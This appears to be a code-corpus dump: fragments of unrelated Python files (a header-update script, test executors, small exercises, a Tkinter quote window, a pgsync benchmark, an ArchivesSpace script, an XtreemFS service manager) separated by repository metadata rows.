for line in headererror : logger.log(fulln + ": "+line,"E")
continue
# Read header variables
headvar={}
line = nextline()
while line[0:2] == "__" :
endn = line.find("__ = '")
if endn == -1 : std = headererror.append("Invalid variable line: " + line)
varn = line[2:endn]
val = line[endn+6:-1]
headvar[varn] = val
line = nextline()
# Check header variables
updatevars = {}
reportvars = {}
author = None
for varn in varlist :
if varn in headvar:
headval = headvar[varn]
if varn == 'author' : # Simply use existing author
author = headval
elif varn == "version" and not needver :
updatevars[varn] = "deleted"
elif varn == "copyright" : # Need to check dates and use oldest
# Find existing dates, assuming format 20nn and one or two dates
cdate = cyear
valid = True
datpos = headval.find("20")
if datpos != -1 :
# read any more digits
cdate='20'
nextpos = datpos+2
while headval[nextpos] in '0123456789' and nextpos < len(headval) :
cdate = cdate + headval[nextpos]
nextpos += 1
# Look for second date
rest = headval[nextpos:]
datpos = rest.find("20")
date2 = ""
if datpos != -1 :
date2 = '20'
nextpos = datpos+2
while rest[nextpos] in '0123456789' and nextpos < len(rest) :
date2 = date2 + rest[nextpos]
nextpos += 1
cval=int(cdate)
if cval < 2000 or cval > int(cyear) : valid = False
if date2 != "" :
val2 = int(date2)
if val2 < cval or val2 > int(cyear) : valid = False
if not valid : cdate = cyear
copyright = copyrightpre + cdate + copyrightpost
if headval != copyright :
updatevars[varn] = ("updated" if valid else "update (invalid dates)")
else :
if headval != standards[varn] :
updatevars[varn] = "updated"
else :
if varn == 'author' :
reportvars[varn] = "no author"
elif varn == "version" and not needver :
pass
else:
updatevars[varn] ="added"
for varn in headvar:
if varn not in varlist: reportvars[varn] = "non-standard"
else :
logger.log( fulln + ": " + "No python header - first line is " + line1, "E")
continue
else :
otherfiles.append(fulln)
continue
# Now have python file with no errors, so can update headers
if action == 'update' and updatevars :
logger.log("Updating "+fulln,"P")
outfile = open("update_headers_temp.txt", "w")
outfile.write(headers + "\n")
for varn in varlist :
if varn == "version" and not needver :
pass
elif varn == "author" :
if author : outfile.write("__author__ = '" + author + "'\n")
elif varn == "copyright" :
outfile.write("__copyright__ = '" + copyright + "'\n")
else:
outfile.write("__" + varn + "__ = '" + standards[varn] + "'\n")
if varn in updatevars :
reason = updatevars[varn]
if reason == "no author" :
logger.log("No author header variable ", "I")
else :
logger.log("Header variable " + varn + " " + reason, "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
outfile.write("__" + varn + "__ = '" + headvar[varn] + "'\n")
logger.log("Non-standard header variable " + varn + " retained", "W")
else:
logger.log("No author header variable", "I")
# Write the rest of the file
outfile.write(line + "\n") # last line read checking headers
for line in file: outfile.write(line)
outfile.close()
file.close()
os.rename(fulln, fulln+"~")
os.rename("update_headers_temp.txt",fulln)
else :
for varn in updatevars :
logger.log(fulln + ": Header variable " + varn + " will be " + updatevars[varn], "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
logger.log(fulln + ": Non-standard header variable " + varn + " present", "W")
else:
logger.log(fulln + ": No author header variable", "I")
print "\n"+"Non-python files"+"\n"
for filen in otherfiles:
print filen
return
def nextline() :
global file
line = file.readline()
line = ("EOF" if line == "" else line.strip())
return line
execute(None,doit, argspec)
| 8,728
| 0
| 46
|
83d2715a3c28310e7a615f390760361ca9c50fc6
| 1,976
|
py
|
Python
|
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
atexit.register(_close_executors)
del _close_executors
| 30.875
| 97
| 0.674089
|
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
class BaseTarget(object):
def __init__(self, executor):
self.executor = executor
class Target(BaseTarget):
_executors_pool = {}
def __init__(self, target, target_name=None, env=None):
"""Factory class for building executors
:param Callable|str target: a native object or a path to an external file, which contains
the structure to be tested
:param str target_name: if target is a path, this indicates the name of the structure to
test
:param str env: environment of the target, usually just the language name itself
"""
executor_id = (target, target_name)
if executor_id not in self._executors_pool:
# Find the corresponding executor
if isstring(target):
cls = ExternalExecutorFabric.get(env) or ExternalExecutorFabric.guess(target)
executor = cls(target, target_name)
elif callable(target):
executor = (ClassExecutor if isclass(target) else FunctionExecutor)(target)
else:
raise TypeError('Target is not a callable nor str')
self._executors_pool[executor_id] = executor
super(Target, self).__init__(self._executors_pool[executor_id])
@classmethod
def close(cls):
for executor_id, e in list(cls._executors_pool.items()):
target, _ = executor_id
logger.debug('Executor %s on %s closed', e.ENVIRONMENT, target)
e.close()
del cls._executors_pool[executor_id]
def _close_executors():
Target.close()
atexit.register(_close_executors)
del _close_executors
| 304
| 1,206
| 95
|
5855a718f19fd271a7d90653c654f8cb39f399af
| 83
|
py
|
Python
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 1
|
2015-08-27T13:03:27.000Z
|
2015-08-27T13:03:27.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 22
|
2015-08-23T18:17:30.000Z
|
2015-09-16T13:38:36.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | null | null | null |
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 13.833333
| 27
| 0.53012
|
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 0
| 0
| 0
|
ca4f6f3248cffb86968c72e3aaf6cc6ec45f47c6
| 430
|
py
|
Python
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | 2
|
2022-01-01T19:31:56.000Z
|
2022-01-01T19:32:54.000Z
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 71.666667
| 101
| 0.711628
|
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 0
| 0
| 0
|
c06c9c6d5402fedf403bcb579088899fc6cd9baf
| 748
|
py
|
Python
|
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 39.368421
| 165
| 0.71123
|
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 0
| 0
| 0
|
fc06bae0a0175ddaa81e9b5257fbdf007c920b1c
| 100
|
py
|
Python
|
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | null | null | null |
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | null | null | null |
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | 1
|
2020-01-22T10:35:38.000Z
|
2020-01-22T10:35:38.000Z
|
from django.apps import AppConfig
| 16.666667
| 36
| 0.78
|
from django.apps import AppConfig
class MgrAnalyticsConfig(AppConfig):
name = 'mgr_Analytics'
| 0
| 42
| 23
|
57bdb73e1704842d0766817fd5391f99486fe936
| 2,062
|
py
|
Python
|
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
| 54.263158
| 113
| 0.727934
|
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
def test_normalize_gesture_data():
recordings_dir = os.path.dirname(linear_accelerometer.__file__)
raw_gestures = read_recordings(recordings_dir=recordings_dir)
normalized_gestures = normalize_mean_std_dict(raw_gestures)
test_output = os.path.join("test_output", "gestures", "normalized")
os.makedirs(test_output, exist_ok=True)
for gesture in normalized_gestures.keys():
normalized = normalized_gestures[gesture]
column_histograms(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-histograms.png"))
plot_columns(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-plots.png"))
motion_measures = normalized.drop(columns=['time', 'label'])
plot_lines(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-lines.png"))
plot_lines(motion_measures, name=f"{gesture} normalized window={SAMPLES_PER_RECORDING}",
filepath=os.path.join(test_output, f"{gesture}-norm-lines-window{SAMPLES_PER_RECORDING}.png"),
vertical_tick_spacing=SAMPLES_PER_RECORDING)
histogram_overlay(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-over-hist.png"))
# https://numpy.org/doc/stable/reference/generated/numpy.allclose.html
assert np.allclose(normalized.mean(), 0.0)
assert np.allclose(normalized.std(), 1.0)
| 1,621
| 0
| 23
|
fb9c84f69582b895624fd919a820ac62d428a59c
| 4,791
|
py
|
Python
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-09-26T21:05:37.000Z
|
2019-09-26T21:05:37.000Z
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | null | null | null |
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-08-27T16:19:09.000Z
|
2019-08-27T16:19:09.000Z
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
if __name__ == "__main__":
main()
| 29.757764
| 77
| 0.529743
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
def insert_op(session: sessionmaker, model, nsize: int) -> None:
faker: Faker = Faker()
rows: Set = set([])
for _ in range(nsize):
kwargs = {}
for column in model.__table__.columns:
if column.foreign_keys:
foreign_key = list(column.foreign_keys)[0]
pk = [
column.name
for column in foreign_key.column.table.columns
if column.primary_key
][0]
fkey = (
session.query(foreign_key.column.table)
.order_by(sa.func.random())
.limit(1)
)
value = getattr(fkey[0], pk)
kwargs[column.name] = value
elif column.primary_key:
continue
else:
field = FIELDS.get(column.name)
if not field:
# continue
raise RuntimeError(f"field {column.name} not in mapping")
value = getattr(faker, field)()
kwargs[column.name] = value
print(f"Inserting {model.__table__} VALUES {kwargs}")
row = model(**kwargs)
rows.add(row)
with Timer(f"Created {nsize} {model.__table__} in"):
try:
session.add_all(rows)
session.commit()
except Exception as e:
print(f"Exception {e}")
session.rollback()
def update_op(session: sessionmaker, model, nsize: int) -> None:
column: str = choice(list(FIELDS.keys()))
if column not in [column.name for column in model.__table__.columns]:
raise RuntimeError()
faker: Faker = Faker()
with Timer(f"Updated {nsize} {model.__table__}"):
for _ in range(nsize):
field = FIELDS.get(column)
value = getattr(faker, field)()
row = (
session.query(model)
.filter(getattr(model, column) != value)
.order_by(sa.func.random())
.limit(1)
)
if row:
print(f'Updating {model.__table__} SET {column} = "{value}"')
try:
setattr(row[0], column, value)
session.commit()
except Exception as e:
session.rollback()
def delete_op(session: sessionmaker, model, nsize: int) -> None:
with Timer(f"Deleted {nsize} {model.__table__}"):
for _ in range(nsize):
row = session.query(model).order_by(sa.func.random()).limit(1)
pk = [
column.name
for column in filter(
lambda x: x.primary_key, model.__table__.columns
)
][0]
if row:
try:
value = getattr(row[0], pk)
print(f"Deleting {model.__table__} WHERE {pk} = {value}")
session.query(model).filter(
getattr(model, pk) == value
).delete()
session.commit()
except Exception as e:
session.rollback()
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
def main(config, nsize, daemon, tg_op):
show_settings()
config: str = get_config(config)
documents: dict = json.load(open(config))
engine = pg_engine(
database=documents[0].get("database", documents[0]["index"])
)
Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
session = Session()
model = Book
func = {
INSERT: insert_op,
UPDATE: update_op,
DELETE: delete_op,
}
# lets do only the book model for now
while True:
if tg_op:
func[tg_op](session, model, nsize)
else:
func[choice(TG_OP)](session, model, nsize)
if not daemon:
break
if __name__ == "__main__":
main()
| 3,797
| 0
| 91
|
b388ad646acdaff30e3ae11dca9c423ac5dc3c80
| 794
|
py
|
Python
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 2
|
2016-09-14T12:31:40.000Z
|
2018-05-25T02:45:37.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 1
|
2017-04-13T16:24:59.000Z
|
2017-04-18T19:30:08.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | null | null | null |
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 37.809524
| 133
| 0.730479
|
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 0
| 0
| 0
|
2abcfcc2281955e4ae7cbe49ec5370d4ae3c495c
| 540
|
py
|
Python
|
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
__author__ = 'Akshay'
| 21.6
| 48
| 0.625926
|
__author__ = 'Akshay'
class Node:
initial_time = 0
finish_time = 0
name = None
child_nodes = None
parent_nodes = None
conditional_probability_table = {}
def __init__(self, nm):
self.name = nm
self.parent_distance = 0
self.child_nodes = []
self.parent_nodes = []
def add_child(self, node=None, weight=None):
self.child_nodes.append((node, weight))
node.parent_nodes.append(self)
def has_child(self, node=None):
return node in self.child_nodes
| 279
| 214
| 23
|
90d1a8e84d85bc7f4e6d8664cd0c5d4332376007
| 38,126
|
py
|
Python
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2015-09-20T18:20:01.000Z
|
2015-09-20T18:20:01.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2020-07-27T11:56:18.000Z
|
2020-07-27T11:56:18.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 3
|
2018-09-14T16:54:14.000Z
|
2020-07-26T03:14:56.000Z
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
| 38.864424
| 138
| 0.577087
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
def invalid_arg(msg):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail=msg).message)
class XtreemFSManager(BaseManager):
def __init__(self, config_parser, **kwargs):
BaseManager.__init__(self, config_parser)
# node lists
self.nodes = [] # all nodes
self.osdNodes = [] # only the OSD nodes
self.mrcNodes = [] # onle the MRC nodes
self.dirNodes = [] # only the DIR nodes
# node counters
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
# wether we want to keep storage volumes upon OSD nodes deletion
self.persistent = False
# default value for OSD volume size
self.osd_volume_size = 1024
# dictionaries mapping node IDs to uuids
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
# dictionary mapping osd uuids to volume IDs
self.osd_uuid_volume_map = {}
# Setup the clouds' controller
self.controller.generate_context('xtreemfs')
def __get__uuid(self, node_id, node_type):
if node_type == 'dir':
node_map = self.dir_node_uuid_map
elif node_type == 'mrc':
node_map = self.mrc_node_uuid_map
elif node_type == 'osd':
node_map = self.osd_node_uuid_map
else:
raise Exception("Unknown node type: %s" % node_type)
node_uuid = node_map.get(node_id)
if node_uuid:
self.logger.debug("%s already has a uuid (%s) -> %s" % (node_id,
node_type, node_uuid))
else:
node_uuid = str(uuid.uuid1())
node_map[node_id] = node_uuid
self.logger.debug("New uuid for %s (%s) -> %s" % (node_id,
node_type, node_uuid))
return node_uuid
def _start_dir(self, nodes):
self.logger.debug("_start_dir(%s)" % nodes)
for node in nodes:
try:
dir_uuid = self.__get__uuid(node.id, 'dir')
client.createDIR(node.ip, 5555, dir_uuid)
except client.AgentException:
self.logger.exception('Failed to start DIR at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_dir(self, nodes, remove):
for node in nodes:
try:
client.stopDIR(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop DIR at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.dir_node_uuid_map[node.id]
def _start_mrc(self, nodes):
for node in nodes:
try:
mrc_uuid = self.__get__uuid(node.id, 'mrc')
client.createMRC(node.ip, 5555, self.dirNodes[0].ip, mrc_uuid)
except client.AgentException:
self.logger.exception('Failed to start MRC at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_mrc(self, nodes, remove):
for node in nodes:
try:
client.stopMRC(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop MRC at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.mrc_node_uuid_map[node.id]
def _start_osd(self, nodes, cloud=None):
for idx, node in enumerate(nodes):
osd_uuid = self.__get__uuid(node.id, 'osd')
volume_associated = osd_uuid in self.osd_uuid_volume_map
# We need a storage volume for each OSD node. Check if this OSD
# node needs a new volume to be created.
if volume_associated:
# No need to create a new volume.
volume = self.get_volume(self.osd_uuid_volume_map[osd_uuid])
self.logger.debug(
'%s already has an associated storage volume (%s)' %
(osd_uuid, volume.id))
else:
# We need to create a new volume.
volume_name = "osd-%s" % osd_uuid
volume = self.create_volume(self.osd_volume_size, volume_name,
node.id, cloud)
self.osd_uuid_volume_map[osd_uuid] = volume.id
try:
self.attach_volume(volume.id, node.id, "sdb")
except Exception, err:
self.logger.error("attach_volume: %s" % err)
try:
client.createOSD(node.ip, 5555, self.dirNodes[0].ip, osd_uuid,
mkfs=not volume_associated)
except client.AgentException:
self.logger.exception('Failed to start OSD at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_osd(self, nodes, remove, drain):
"""Stop OSD service on the given nodes.
The volume is always detached.
If remove is True, the volume is destroyed and node and volume are
deleted from internal data structures.
If drain is True, data is moved to other OSDs."""
for node in nodes:
try:
client.stopOSD(node.ip, 5555, drain)
except client.AgentException:
self.logger.exception('Failed to stop OSD at node %s' % node)
self.state = self.S_ERROR
raise
volume_id = self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
self.detach_volume(volume_id)
# destroy volumes and delete entries from internal state
if remove:
self.destroy_volume(volume_id)
del self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
del self.osd_node_uuid_map[node.id]
else:
self.logger.debug('Not destroying volume %s' % volume_id)
def _do_startup(self, cloud, resuming=False):
"""Starts up the service. The first nodes will contain all services.
If 'resuming' is set to True, we do not start XtreemFS services now.
set_service_snapshot will do that.
"""
startCloud = self._init_cloud(cloud)
try:
# NOTE: The following service structure is enforce:
# - the first node contains a DIR, MRC and OSD,
# those services can not be removed
# - added DIR, MRC and OSD services will all run
# on exclusive nodes
# - all explicitly added services can be removed
# create 1 node
node_instances = self.controller.create_nodes(1,
client.check_agent_process, 5555, startCloud)
# use this node for DIR, MRC and OSD
self.nodes += node_instances
self.dirNodes += node_instances
self.mrcNodes += node_instances
self.osdNodes += node_instances
# start DIR, MRC, OSD
if not resuming:
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes, startCloud)
# at the startup the DIR node will have all the services
self.dirCount = 1
self.mrcCount = 1
self.osdCount = 1
self.logger.info('Created 1 node with DIR, MRC and OSD services')
except:
self.logger.exception('do_startup: Failed to request a new node')
self.state = self.S_STOPPED
return
self.logger.info('XtreemFS service was started up')
self.state = self.S_RUNNING
@expose('POST')
def shutdown(self, kwargs):
self.state = self.S_EPILOGUE
# start _do_shutdown(stop_services=True) in a thread
Thread(target=self._do_shutdown, args=[True]).start()
return HttpJsonResponse()
def _start_all(self):
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes)
def _stop_all(self, remove=True):
"""Stop all xtreemfs services on all agents (first osd, then mrc, then
dir)."""
# do not drain (move data to other OSDs), since we stop all
self._stop_osd(self.osdNodes, remove=remove, drain=False)
self._stop_mrc(self.mrcNodes, remove=remove)
self._stop_dir(self.dirNodes, remove=remove)
def _do_shutdown(self, stop_services=False):
# check if we need to stop the services or not, i.e. when called at
# the end of get_snapshot()
if stop_services:
self._stop_all(remove=True)
self.controller.delete_nodes(self.nodes)
self.nodes = []
self.dirNodes = []
self.mrcNodes = []
self.osdNodes = []
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
self.state = self.S_STOPPED
return HttpJsonResponse()
@expose('POST')
def add_nodes(self, kwargs):
#self.controller.add_context_replacement(dict(STRING='xtreemfs'))
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to add_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
resuming = False;
if 'resuming' in kwargs:
resuming = kwargs['resuming']
# Adding DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
# Adding MRC Nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
# TODO: 'osd' is no longer required, when adding other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse('ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "nr osd"')
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[nr_dir, nr_mrc, nr_osd, kwargs['cloud'], resuming]).start()
return HttpJsonResponse()
